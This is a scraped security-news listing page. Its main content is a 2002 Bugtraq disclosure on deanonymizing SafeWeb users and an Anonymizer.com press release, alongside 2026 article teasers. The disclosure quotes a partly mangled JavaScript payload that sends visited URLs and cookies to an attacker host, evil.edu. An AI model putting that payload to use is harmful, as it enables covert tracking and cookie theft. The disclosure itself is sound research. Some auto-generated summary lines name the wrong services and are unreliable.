Network Security
system security Linux network
system security Linux network The romanticized image of the digital nomad – a laptop on a sun-drenched balcony – rarely accounts for the actual friction of maintaining a professional development environment on the move. . The friction is amplified with Linux. We are looking for a setup that respects our kernel configurations, handles volatile network handovers, and maintains a strict security posture without the hand-holding of a consumer-grade OS – so, put simply, more than just a laptop and a sunny deck. The hardware is...
May 26, 2026
Server Securityopen-source Linux administration
open-source Linux administration Cron has existed in Unix and Linux environments for decades, handling backups, cleanup scripts, patching jobs, log rotation, monitoring tasks, and other maintenance work that administrators do not want to run manually. Most Linux servers rely on it constantly, which is exactly why attackers continue abusing it for persistence after a system has already been compromised. . Persistence through cron is not complicated. Attackers do not need a rootkit or advanced malware framework to maintain...
May 25, 2026
Vendors/Productssecurity breach linux
security breach linux A major internal repository breach at GitHub has exposed a critical and overlooked blind spot in Linux supply chain security. Kernel exploits, exposed SSH services, weak firewall rules, and vulnerable daemons dominated the Linux threat model for years, and in many environments, they still matter. But recent supply-chain incidents involving GitHub ecosystems, npm packages, and malicious developer tooling point somewhere else entirely: the developer workstation. . The breach matters because...
May 21, 2026
Security Trends access control multi-tenant
access control multi-tenant Linux administrators often face an ugly choice in the cloud: prioritize convenience and cost-efficiency by sharing infrastructure, or sacrifice those benefits for the sake of total isolation. Most modern Linux workloads don't live on their own private servers anymore. They live in shared environments like Kubernetes clusters, where multiple teams and services run side-by-side. It sounds efficient, and it usually is. . But cloud isolation isn't as ironclad as it looks on the diagram. If you...
May 21, 2026
Vendors/Productsincident response cloud security
incident response cloud security Managed Extended Detection and Response (MXDR) has become one of the most sought-after security services in the enterprise market — and with good reason. It promises the holy grail: broad visibility across endpoints, network, cloud, email, and identity, combined with the 24/7 human expertise most organizations simply cannot build in-house. . However, the rapid growth of the market has produced a wide range of providers whose capabilities vary considerably beneath the surface. Choosing the...
May 19, 2026
Refine news
X Clear Filters
Get the latest News and Insights
Get the latest Linux and open source security news straight to your inbox.
Community Poll
What got you started with Linux?
Loading...
Explore Latest Linux Security news
We found -3 articles for you...
81
privacy risksecurity reportJavaScript exploitSafeWeb Anonymity Service Faces JavaScript Exploits and Risks
Although SafeWeb's Web anonymizing service has been shut down since December, they claimed it was the "most widely used online privacy service in the world". .. Andrew Schulman and I have just finished a technical report detailing SafeWeb's catastrophic failures under the simplest of JavaScript attacks by Web sites or firewalls (e.g., by redirecting to a page containing the exploit).. . .. Although SafeWeb's Web anonymizing service has been shut down since December, they claimed it was the "most widely used online privacy service in the world"... Andrew Schulman and I have just finished a technical report detailing SafeWeb's catastrophic failures under the simplest of JavaScript attacks by Web sites or firewalls (e.g., by redirecting to a page containing the exploit). Date: Mon, 11 Feb 2002 21:13:27 -0500 From: David Martin To: bugtraq@ Subject: Deanonymizing SafeWeb Users Although SafeWeb's Web anonymizing service has been shut down since December, they claimed it was the "most widely used online privacy service in the world". SafeWeb licensed their technology to PrivaSec, who is currently running the technology in a preview program for a planned subscription service. They also licensed it to the CIA. Andrew Schulman and I have just finished a technical report detailing SafeWeb's catastrophic failures under the simplest of JavaScript attacks by Web sites or firewalls (e.g., by redirecting to a page containing the exploit). An example (really one long line): self['window']['top'].frames[0]['cookie_munch'] = Function('i=new Image(1,1);i.s'+'rc=" cation"].URL_text.value+(new Date()).getTime()+document.cookie;'); This is spyware. Any Web page containing this JavaScript makes the SafeWeb browser silently report every URL visited to the attacker at evil.edu, along with a copy of all of the persistent cookies previously established through SafeWeb. It works regardless of the user's security settings (recommended vs paranoid mode, etc.) This attack is the only one we describe that depends on thebrowser: it works in Netscape 6.x and probably previous versions, but not IE. We have an attack that does basically the same thing and works in IE too, but it's a bit longer. Since our attacks are just JavaScript, they probably don't depend on the OS of the victim. Basically, using the SafeWeb privacy service helps keep user identities out of routinely gathered log files, but it creates serious new risks for anyone an adversary might bother to actually target. You have to wonder whether this is a good tradeoff. After all, in the absence of serious bugs, Web browsers generally prevent Web sites from silently depositing spyware or snarfing all of the user's cookies. One thing is clear: most users in the intended market for this system had no idea that this system brought any risks with it. For the full report (23 pages, PDF): We've been in touch with SafeWeb since October, and with PrivaSec for about a month now. Some related problems in SafeWeb involving JavaScript spilling IP addresses have been noted here (by Alexander Yezhov) and in alt.privacy.anon-server (by Paul Rubin). Our paper adds spyware, cookie snarfing, and the essential equivalence between SafeWeb's "paranoid" and "recommended" modes of operation to the list of problems with SafeWeb's technology. David Martin Andrew Schulman . WebGuard's privacy platform faces challenges from HTML script vulnerabilities and session hijacking threats identified in our analysis.. Privacy Service, JavaScript Attacks, Cookie Exploitation. . LinuxSecurity.com Team
Feb 14, 2002
•
Privacy
81
web securitysecurity solutionsinternet privacyAnonymizer.com Achieves 1 Billion Pages Protected in Internet Privacy
Regina Purcell sent in a timely press release about the availability of their Anonymizer service. "Anonymizer.com today announced that more than 1 billion Web page views have been protected with the company's Anonymous Surfing service since its launch in . . . . Regina Purcell sent in a timely press release about the availability of their Anonymizer service. "Anonymizer.com today announced that more than 1 billion Web page views have been protected with the company's Anonymous Surfing service since its launch in 1996. The milestone highlights Anonymizer.com's ongoing success in the Internet Privacy and Security field, where it has operated profitably since 2000." Anonymizer.com Celebrates "1 Billion Pages Protected" Milestone Company's Success Validates Consumer Privacy Business Model Anonymizer.com today announced that more than 1 billion Web page views have been protected with the company's Anonymous Surfing service since its launch in 1996. The milestone highlights Anonymizer.com's ongoing success in the Internet Privacy and Security field, where it has operated profitably since 2000. Anonymizer.com CEO Bill Unrue attributes the company's success to its loyal user base and sound business practices. "Anonymizer.com has taken leading technology and built it into a simple, robust consumer product," he said. "By staying tuned to our customers' needs, we have developed the products and business strategies that have been the backbone of our success." New developments at Anonymizer.com set to roll out before the end of 2001 include a major upgrade of the popular Anonymizer Privacy Button, improved speed and functionality on the Anonymous Surfing service, and the launch of a complementary Web site, OnlinePrivacyStore.com, that offers an array of privacy and security solutions. About Anonymizer.com Anonymizer.com, founded in 1997, is a privately held company headquartered in San Diego, Calif. Anonymizer.com offers a complete range of free and premium services for the privacy and security needs ofconsumers and enterprises. Visit https://ntrepidcorp.com . PrivacyGuard.net commemorates the securing of more than 1 billion sites, emphasizing its dedication to online confidentiality and user protection.. Anonymity Service, Internet Privacy, Webpage Protection, Security Solutions. . LinuxSecurity.com Team
Nov 19, 2001
•
Privacy
Get the latest News and Insights
Get the latest Linux and open source security news straight to your inbox.
Community Poll
What got you started with Linux?
Search Topics
Powered By
Linux Security - Your source for Top Linux News, Advisories, HOWTOs and Feature Releases
QUICK LINKS
subscribe to newsletters!
Like staying secure? So do we.
Sign up for updates, tips, and alerts!
Discover faster search, smarter navigation, and deeper Linux security insights. Read More